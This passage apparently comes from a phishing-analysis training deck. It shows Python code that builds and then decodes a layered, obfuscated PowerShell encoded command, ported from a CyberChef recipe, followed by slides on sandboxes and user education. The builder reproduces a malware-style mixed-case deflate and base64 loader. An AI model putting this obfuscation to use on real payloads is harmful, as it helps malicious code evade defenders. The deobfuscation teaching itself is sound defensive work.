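    comp = zlib.compressobj(9, zlib.DEFLATED, -15)   # -15 = raw deflate stream
    inner = base64.b64encode(comp.compress(stage2.encode()) + comp.flush()).decode()
    chunks = [inner[i:i + 7] for i in range(0, len(inner), 7)]
    joined = "+".join(f"'{c}'" for c in chunks)
    script = (
        "( NeW-OBJEct sYSTEm.Io.COmPReSsiON.DEFlaTestREaM([IO.MEMoryStREam]"
        f"[sySTeM.cONveRT]::fRoMBAse64stRINg(({joined})) , "
        "[iO.CoMpressIon.comPreSsIonMOdE]::dECompREsS) |ForEach { NeW-OBJEct "
        "iO.sTReAMreAdEr( $_ ,[SyStEm.TeXT.EnCOdING]::AsciI ) }).reADTOEnD( )"
    )
    return base64.b64encode(script.encode("utf-16-le")).decode()


def round1(encoded: str) -> str:
    """From Base64, then Remove null bytes: -e takes UTF-16LE, so every other
    byte of ASCII text is 0x00 (the dots on the CyberChef slide).  Then
    Find/Replace '+' with nothing, which rejoins the chunked string literal."""
    text = base64.b64decode(encoded).replace(b"\x00", b"").decode("ascii")
    return text.replace("'+'", "")


def extract_inner_base64(script: str) -> str:
    """Pull the single-quoted argument of FromBase64String out of round-1 output."""
    m = re.search(r"fRoMBAse64stRINg\(\('([A-Za-z0-9+/=]+)'\)", script, re.IGNORECASE)
    if not m:
        raise ValueError("no FromBase64String('...') argument found")
    return m.group(1)


def round2(inner: str) -> str:
    """From Base64, then Raw Inflate: DeflateStream emits raw deflate with no
    zlib header, hence wbits=-15 (CyberChef 'Raw Inflate', not 'Zlib Inflate')."""
    return zlib.decompress(base64.b64decode(inner), wbits=-15).decode("ascii")


def matched_indicators(script: str) -> list:
    """Names of the behaviours present in a decoded script."""
    return [name for name, pat in INDICATORS.items()
            if re.search(pat, script, re.IGNORECASE)]


def deobfuscate(encoded: str) -> dict:
    """Run both recipe rounds on a -e argument and report what the result does."""
    stage1 = round1(encoded)
    stage2 = round2(extract_inner_base64(stage1))
    return {"stage1": stage1, "stage2": stage2,
            "indicators": matched_indicators(stage2)}


if __name__ == "__main__":
    result = deobfuscate(build_encoded_command(SAMPLE_STAGE2))
    print(result["stage2"])
    print("indicators:", ", ".join(result["indicators"]))
```

Two details matter when porting the recipe: decoding the -e argument as UTF-16LE is the cleaner equivalent of "From Base64 + Remove null bytes" (the null stripping above is kept to mirror the slide), and the second round must be a raw inflate, because .NET's DeflateStream writes no zlib header, so a plain zlib decompress fails on it.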

SLIDE 38

Online Analysis: VirusTotal

SLIDE 39

Online Tools: Hybrid-Analysis

SLIDE 40

Online Tools: Any.run

SLIDE 41

CAPE

SLIDE 42

To Sum It Up…

There is no way to stop ALL phishing. Therefore...

  • Continuously educate your users
  • Provide incentives to reinforce the message
  • Build relationships with the business
  • Invest in tools
  • Automate where you can
  • Manual analysis is just as important as automation

SLIDE 43

Questions?